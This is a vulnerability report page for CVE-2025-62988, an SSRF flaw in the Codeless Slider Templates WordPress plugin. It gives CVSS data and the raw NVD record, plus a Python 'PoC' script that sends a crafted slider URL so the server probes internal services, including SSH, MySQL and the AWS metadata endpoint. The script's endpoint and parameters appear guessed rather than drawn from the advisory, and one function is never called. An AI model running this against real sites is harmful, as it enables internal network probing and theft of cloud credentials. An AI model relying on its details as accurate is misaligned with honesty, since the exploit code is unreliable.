Security Vulnerability Report
中文
CVE-2025-62988 CVSS 4.9 MEDIUM

CVE-2025-62988

Published: 2025-10-27 02:16:00
Last Modified: 2026-04-27 17:16:40

Description

Server-Side Request Forgery (SSRF) vulnerability in Codeless Slider Templates slider-templates allows Server Side Request Forgery.This issue affects Slider Templates: from n/a through <= 1.0.3.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Codeless Slider Templates <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-62988 PoC - Codeless Slider Templates SSRF Note: This is for educational and authorized testing purposes only. """ import requests import sys TARGET_URL = "http://target-wordpress-site.com" # Target can be internal IP, localhost, or cloud metadata endpoint SSRF_TARGET = "http://127.0.0.1:22" def exploit_ssrf(target_url, ssrf_target): """Exploit SSRF vulnerability in Codeless Slider Templates plugin""" # The vulnerable endpoint typically accepts slider template parameters endpoint = f"{target_url}/wp-json/wp/v2/slider-templates" # Malicious payload that triggers SSRF payload = { 'slider_url': ssrf_target, 'action': 'fetch_template' } try: response = requests.post(endpoint, data=payload, timeout=10) print(f"[*] Request sent to: {endpoint}") print(f"[*] SSRF Target: {ssrf_target}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Potential SSRF - Response received") print(f"[*] Response Length: {len(response.text)} bytes") else: print("[-] No obvious SSRF response") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") def scan_internal(target_url): """Scan common internal services via SSRF""" internal_targets = [ ("SSH", "http://127.0.0.1:22"), ("MySQL", "http://127.0.0.1:3306"), ("AWS Metadata", "http://169.254.169.254/latest/meta-data/"), ] for name, url in internal_targets: print(f"\n[*] Testing {name}...") exploit_ssrf(target_url, url) if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_ssrf(TARGET_URL, SSRF_TARGET)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62988", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:59.860", "lastModified": "2026-04-27T17:16:39.930", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Codeless Slider Templates slider-templates allows Server Side Request Forgery.This issue affects Slider Templates: from n/a through <= 1.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/slider-templates/vulnerability/wordpress-slider-templates-plugin-1-0-3-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}